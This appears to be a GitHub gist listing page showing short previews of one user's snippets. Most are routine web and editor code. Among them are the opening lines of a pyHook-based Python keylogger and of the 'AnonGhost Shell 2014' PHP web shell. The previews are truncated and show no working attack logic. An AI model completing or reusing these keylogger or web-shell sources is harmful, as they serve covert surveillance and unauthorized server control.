Skip to content

Instantly share code, notes, and snippets.

View mustafat0k's full-sized avatar
🚀
Go

Mustafa mustafat0k

🚀
Go
View GitHub Profile
@mustafat0k
mustafat0k / .py
Last active March 9, 2019 16:06
Python Keylogger
import pyHook
import pythoncom
import sys
class dinlensek:
def __init__(self):
exitKey="4"
adres="C:\kayit.txt" #acılacak txt dosyasının adresi
self.exitKey= exitKey
@mustafat0k
mustafat0k / .html Cordova Camera Plugin Cordova plugin camera foto cek kayit et server e jquery ajax ile yükle cordova-plugin-camera upload jquery ajax to server request
<!DOCTYPE html>
<!-- Aysad Kozanoglu -->
<html>
<head>
<title>foto cek</title>
<style>
html {
-webkit-user-select: none;
}
</style>
@mustafat0k
mustafat0k / .py
Created November 15, 2016 05:47
Sublime text bootstrap plugin
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
@mustafat0k
mustafat0k / .js
Created November 16, 2016 08:38 — forked from Alexintosh/$localstorage
Angular factory for local storage
.factory('$localstorage', ['$window', function($window) {
return {
set: function(key, value) {
$window.localStorage[key] = value;
},
get: function(key, defaultValue) {
return $window.localStorage[key] || false;
},
setObject: function(key, value) {
$window.localStorage[key] = JSON.stringify(value);
@mustafat0k
mustafat0k / .html
Created December 29, 2016 10:18
Panel bilgileri
id 7
title asfasdafsd
postalcode asdfasdf
stars 2
object_type_id 1
address asfasffd
undertitle asdfasdf
email [email protected]
content
brief_description adsasdasd
<?php
class CountriesTableSeeder extends Seeder {
public function run()
{
Country::insert([
[
'long_name' => 'Afghanistan',
'short_name' => 'AF',
@mustafat0k
mustafat0k / .py
Created January 10, 2017 15:52
Linux için Kali repolarını çağırmak. Katoolin
#!/usr/bin/python
import os
import sys, traceback
def main():
try:
print ('''
$$\ $$\ $$\ $$\ $$\
@mustafat0k
mustafat0k / js-crypto-libraries.md
Created February 17, 2017 22:35 — forked from jo/js-crypto-libraries.md
List of JavaScript Crypto libraries.

JavaScript Crypto Libraries

I start with a list and plan to create a comparison table.

WebCryptoAPI

http://www.w3.org/TR/WebCryptoAPI/

This specification describes a JavaScript API for performing basic cryptographic operations in web applications, such as hashing, signature generation and verification, and encryption and decryption. Additionally, it describes an API for applications to generate and/or manage the keying material necessary to perform these operations. Uses for this API range from user or service authentication, document or code signing, and the confidentiality and integrity of communications.

@mustafat0k
mustafat0k / pubsub.js
Created February 18, 2017 17:34 — forked from learncodeacademy/pubsub.js
Basic Javascript PubSub Pattern
//events - a super-basic Javascript (publish subscribe) pattern
var events = {
events: {},
on: function (eventName, fn) {
this.events[eventName] = this.events[eventName] || [];
this.events[eventName].push(fn);
},
off: function(eventName, fn) {
if (this.events[eventName]) {
@mustafat0k
mustafat0k / AnonGhost Shell 2014 Priv8.php
Created February 26, 2017 07:33
AnonGhost Shell 2014 Priv8
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// global configs